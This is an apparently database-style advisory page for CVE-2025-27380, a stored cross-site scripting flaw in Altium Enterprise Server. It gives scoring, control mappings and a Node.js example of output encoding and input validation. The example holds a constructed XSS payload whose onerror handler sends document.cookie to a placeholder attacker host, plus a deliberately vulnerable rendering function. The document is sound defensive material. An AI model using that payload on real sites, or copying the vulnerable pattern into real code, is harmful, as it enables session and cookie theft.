Cyber Resilience

CVE-2025-27380

Severity: High
Published: 22 January 2026
Modified: 26 February 2026
CISA KEV: not listed
CVSS v3.1 base score: 7.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)
EPSS score: 0.0002 (5.1 percentile)
Risk priority: 15 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-27380 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Altium On-Prem Enterprise Server. Its CVSS base score is 7.6 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Browser Session Hijacking (T1185). Its EPSS score places it at the 5.1 percentile for exploit likelihood, well below the median, and it is not currently listed in the CISA KEV catalog.

The fix is to move affected installs out of the vulnerable version range per the vendor advisory. Beyond patching, the strongest compensating controls our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering), applied to the Project Release content that the server renders for other users.

Deeper analysis

CVE-2025-27380 is an HTML injection vulnerability (CWE-79) in the Project Release component of Altium Enterprise Server (AES) version 7.0.3, affecting all supported platforms. Published on 2026-01-22, it has a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N). The flaw enables an authenticated attacker to inject crafted HTML content, leading to the execution of arbitrary JavaScript in the victim's browser.

An authenticated user with low privileges (PR:L) can exploit this vulnerability over the network (AV:N) with low attack complexity (AC:L), but it requires user interaction (UI:R): a victim must view the page that renders the injected Project Release content. The scope changes (S:C) because the vulnerable component is the server while the impacted component is the victim's browser, which is the usual scoring for cross-site scripting. Confidentiality impact is high (C:H): the injected script runs inside the victim's authenticated session and can read whatever that session can reach in the application, including session tokens if they are exposed to script, as well as user and project data. Integrity impact is rated low (I:L) and availability is unaffected (A:N). Two practitioner caveats: marking the session cookie HttpOnly prevents document.cookie from being read but does not stop injected script from issuing authenticated requests on the victim's behalf, and because the attacker needs a valid low-privilege account, the realistic threat is a malicious or compromised internal user rather than an anonymous one.

For mitigation details, refer to the Altium security advisory at https://www.altium.com/platform/security-compliance/security-advisories.

Vulnerability details

HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim’s browser via crafted HTML content.

CWE(s)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1185 Browser Session Hijacking (Collection)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Why this technique?

XSS via HTML injection runs attacker-controlled script inside the victim's authenticated browser session, which directly enables theft of session tokens and other session data. Note that the ATT&CK entry for T1185 is written around an adversary already on the victim's host abusing the browser; the mapping here is by outcome (hijack of the authenticated session), not by the access path.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-1010 (same product: Altium On-Prem Enterprise Server)
CVE-2025-27378 (same product: Altium On-Prem Enterprise Server)
CVE-2026-1008 (same vendor: Altium)
CVE-2026-1009 (same vendor: Altium)
CVE-2025-25203 (shared CWE-79)
CVE-2025-67959 (shared CWE-79)
CVE-2025-68835 (shared CWE-79)
CVE-2026-32118 (shared CWE-79)
CVE-2025-24617 (shared CWE-79)
CVE-2026-30934 (shared CWE-79)

Affected Assets

Altium On-Prem Enterprise Server, versions 7.0.3 through 7.0.6

Note that the vulnerability description above names 7.0.3 specifically, while the affected range recorded here runs to 7.0.6. Treat every install in that range as affected until the vendor advisory confirms the fixed build for your deployment.

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

Prevent: SI-2 Flaw Remediation
Directly remediates the HTML injection flaw in Altium Enterprise Server 7.0.3 by identifying, reporting, and applying the vendor's patch or update. This is the control that actually closes the bug; the two below limit exposure until it is applied and harden against the same class of flaw elsewhere.

Prevent: SI-15 Information Output Filtering
Encodes or filters Project Release content before it is rendered in the viewer's browser, so injected markup is displayed as literal text rather than parsed and executed as JavaScript.

Prevent: SI-10 Information Input Validation
Validates incoming Project Release content against the expected format at the point it is stored, rejecting markup in fields meant to hold plain text. Validation narrows what reaches the store but does not substitute for output encoding at render time, since other write paths or previously stored data can bypass it.
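As an added example that is not code from the original page or from Altium, the following Node.js snippet shows the two application-layer controls above (SI-15 output encoding and SI-10 input validation) applied to a hypothetical release-notes field that is rendered to other users, next to the vulnerable concatenation pattern they prevent. The field name, the payload, the length limit and the attacker host are all constructed for illustration and say nothing about how the Project Release component is actually implemented.

```javascript
// Added illustrative example (not Altium code): the output-filtering (SI-15) and
// input-validation (SI-10) controls above, applied to a hypothetical "release
// notes" field that is rendered into HTML for other users, the same shape of
// flaw as CVE-2025-27380. Runs under Node.js; no DOM or network is used.

// Constructed attacker payload: what a low-privilege user might save as release
// notes. The onerror handler would run in every viewer's browser and send their
// cookies to a host the attacker controls (attacker.example is a placeholder).
const CRAFTED_RELEASE_NOTES =
  'Build 7.0.3 ready <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)"> see notes';

// Vulnerable pattern, kept for contrast: untrusted text is concatenated into
// markup verbatim, so the browser parses the <img onerror=...> as a real tag.
function renderReleaseVulnerable(notes) {
  return `<div class="release-notes">${notes}</div>`;
}

// SI-15, output encoding: replace the five characters that can change context
// in HTML text or quoted attribute values. The browser then shows the payload
// as literal text instead of interpreting it as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderReleaseSafe(notes) {
  return `<div class="release-notes">${escapeHtml(notes)}</div>`;
}

// SI-10, input validation on the write path: in this hypothetical schema release
// notes are plain text, so reject markup characters and over-long input before
// anything is stored. This narrows what can reach the store; it does not replace
// encoding at render time, because other write paths or older data may bypass it.
const NOTES_MAX_LEN = 2000; // assumed field limit
function validateReleaseNotes(notes) {
  if (typeof notes !== 'string') return { ok: false, reason: 'not a string' };
  if (notes.length > NOTES_MAX_LEN) return { ok: false, reason: 'exceeds length limit' };
  if (/[<>]/.test(notes)) return { ok: false, reason: 'markup characters not allowed' };
  return { ok: true, value: notes.trim() };
}

// Reviewer self-check on rendered output: does any HTML tag survive inside the
// wrapper? Encoded output must never contain a raw "<" followed by a tag start.
function containsHtmlTag(html) {
  const body = html.replace(/^<div class="release-notes">/, '').replace(/<\/div>$/, '');
  return /<[a-z!\/]/i.test(body);
}

// Demonstration when run directly: node example.js
console.log('vulnerable :', renderReleaseVulnerable(CRAFTED_RELEASE_NOTES));
console.log('encoded    :', renderReleaseSafe(CRAFTED_RELEASE_NOTES));
console.log('validation :', JSON.stringify(validateReleaseNotes(CRAFTED_RELEASE_NOTES)));
console.log('tag in vulnerable output:', containsHtmlTag(renderReleaseVulnerable(CRAFTED_RELEASE_NOTES)));
console.log('tag in encoded output   :', containsHtmlTag(renderReleaseSafe(CRAFTED_RELEASE_NOTES)));
```

The encoded rendering displays the payload as literal text; the point of the `containsHtmlTag` check is that the SI-15 property (no raw tag survives in rendered output) can be asserted in a unit test over the renderer rather than eyeballed. Keep the validation rule and the encoder as separate layers: rejecting `<` and `>` on write stops the obvious payload, but only encoding at render time protects against data that arrived through another path.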
